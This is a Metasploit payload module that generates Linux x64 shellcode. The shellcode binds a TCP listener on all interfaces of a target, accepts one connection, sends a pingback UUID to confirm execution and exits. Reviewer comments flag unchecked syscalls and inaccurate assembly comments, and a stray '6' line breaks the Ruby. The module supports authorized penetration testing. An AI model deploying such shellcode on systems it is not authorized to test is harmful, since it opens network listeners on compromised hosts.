##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
module MetasploitModule
  # Byte length of the shellcode #generate emits with the default options.
  # The framework compares this against the real output, so it must be
  # regenerated whenever the assembly below changes in any way.
  CachedSize = 109

  include Msf::Payload::Linux::X64::Prepends
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the payload metadata. This is a bind payload (Msf::Handler::BindTcp):
  # the target listens and the framework connects to it. The session type is
  # Msf::Sessions::Pingback -- per the description the payload only reports a
  # UUID over the connection; it does not hand over a shell.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below via merge_info.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux x64 Pingback, Bind TCP Inline',
        'Description' => 'Accept a connection from attacker and report UUID (Linux x64)',
        'Author' => [ 'bwatters-r7' ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::BindTcp,
        'Session' => Msf::Sessions::Pingback
      )
    )
  end

  # Assembles the Linux x64 shellcode:
  #   socket(AF_INET, SOCK_STREAM, 0) -> bind(0.0.0.0:LPORT) -> listen(1)
  #   -> accept() -> write(client_fd, pingback_uuid) -> exit(1)
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload::Single interface.
  # @return [String] raw machine code produced by Metasm.
  #
  # Only LPORT is read from the datastore; the listen address is hard-coded to
  # 0.0.0.0 (INADDR_ANY), i.e. the listener is reachable on every interface of
  # the target. The UUID is generated once (||=) and embedded as literal bytes.
  #
  # NOTE(review): only the socket() result is error-checked (`test rax, rax` /
  # `js failed`). The return values of bind, listen and accept are never tested,
  # so if bind fails (e.g. LPORT already in use, or not permitted for the
  # current user) execution simply continues into listen/accept; what happens
  # then depends on the kernel (possibly listening on a port other than LPORT,
  # or a write() to a negative "fd"). Adding `test rax, rax; js failed` after
  # those syscalls would be the fix, but it changes CachedSize, so it is only
  # flagged here.
  #
  # NOTE(review): two `;` comments inside the assembly string are inaccurate and
  # are left untouched below because the string is the assembler input: the
  # structure handed to bind is a 16-byte sockaddr_in (matching the 0x10 length
  # in rdx), not a sockaddr_in6; and the addrlen pushed before accept is
  # 0x1c (28), not 16, although only 16 bytes (two `push rdx`) were reserved
  # for the peer address. Presumably harmless for an AF_INET peer, whose
  # address is 16 bytes -- confirm before changing.
  def generate(_opts = {})
    # Port is emitted in network byte order, e.g.
    # 22 -> "0x00,0x16"
    # 4444 -> "0x11,0x5c"
    #
    # Packing: [LPORT].pack('v') gives the port little-endian (5c 11 for 4444),
    # 2 (AF_INET) via 'n' gives 00 02; unpack('N') reads those four bytes
    # big-endian -> 0x5c110002. When that 32-bit value is the LOW half of the
    # pushed qword, the stack holds 02 00 11 5c 00 00 00 00 = sin_family,
    # sin_port (network order), sin_addr -- the first 8 bytes of a sockaddr_in.
    encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack('N').first
    # 0.0.0.0 -> 0; occupies the high 32 bits of the immediate (sin_addr).
    encoded_host = Rex::Socket.addr_aton('0.0.0.0').unpack('V').first
    # Single 64-bit immediate for `mov rcx, ...`: host in the upper 32 bits,
    # family+port in the lower 32 bits (both zero-padded to 8 hex digits).
    encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
    self.pingback_uuid ||= generate_pingback_uuid
    # Hex UUID string -> "0xAA,0xBB,..." for a `db` directive; one item per byte.
    uuid_as_db = '0x' + pingback_uuid.chars.each_slice(2).map(&:join).join(',0x')

    # Stack layout notes for the assembly:
    # - The initial `push rsi` / `push rax` are never popped (presumably saving
    #   caller state for the prepends -- not verified here). The saved rax ends
    #   up directly above the pushed sockaddr_in, i.e. it becomes the 8 bytes of
    #   sin_zero padding.
    # - `mov rsi, rsp` followed by `push rsp; pop rsi` both load the struct
    #   pointer into rsi; the second form is redundant but left as-is so the
    #   emitted bytes (and CachedSize) do not change.
    # - After the write() syscall there is no jump, so execution falls through
    #   into `failed:` and the process exits with status 1 on both the success
    #   and the failure path.
    asm = %^
      push rsi
      push rax
      ;SOCKET
      push 0x29
      pop rax
      cdq
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
      test rax, rax
      js failed

      xchg rdi, rax
      mov rcx, #{encoded_host_port}
      push rcx
      mov rsi, rsp
      push rsp
      pop rsi ; store pointer to struct

    bind_call:
      ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
      ; rdi -> fd already stored in rdi
      ; rsi -> pointer to sockaddr_in6 struct already in rsi
      push 0x31
      pop rax ; bind syscall
      push 0x10 ; sockaddr length
      pop rdx ;
      syscall

    listen_call:
      ; int listen(int sockfd, int backlog);
      ; rdi -> fd already stored in rdi
      push 0x32
      pop rax ; listen syscall
      push 0x1
      pop rsi ; backlog
      syscall

    accept_call:
      ; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
      ; rdi -> fd already stored in rdi
      push 0x2b
      pop rax ; accept syscall
      cdq ; zero-out rdx via sign-extension
      push rdx
      push rdx
      push rsp
      pop rsi ; when populated, client will be stored in rsi
      push 0x1c
      lea rdx, [rsp] ; pointer to length of rsi (16)
      syscall
      xchg rdi, rax ; grab client fd
    send_pingback:
      ; sys_write(fd:rdi, buf*:rsi, length:rdx)
      push #{uuid_as_db.split(',').length} ; length of the PINGBACK UUID
      pop rdx ; length in rdx
      call get_uuid_address ; put uuid buffer on the stack
      db #{uuid_as_db} ; PINGBACK_UUID
    get_uuid_address:
      pop rsi ; UUID address into rsi
      xor rax, rax ; sys_write = offset 1
      inc rax ; sys_write = offset 1
      syscall ; call sys_write

    failed:
      push 0x3c
      pop rax
      push 0x1
      pop rdi
      syscall ; exit(1)
    ^
    # Assemble for x86-64 and return the raw bytes (no encoding/prepends here;
    # the included mixins handle those at a higher layer).
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
  end
end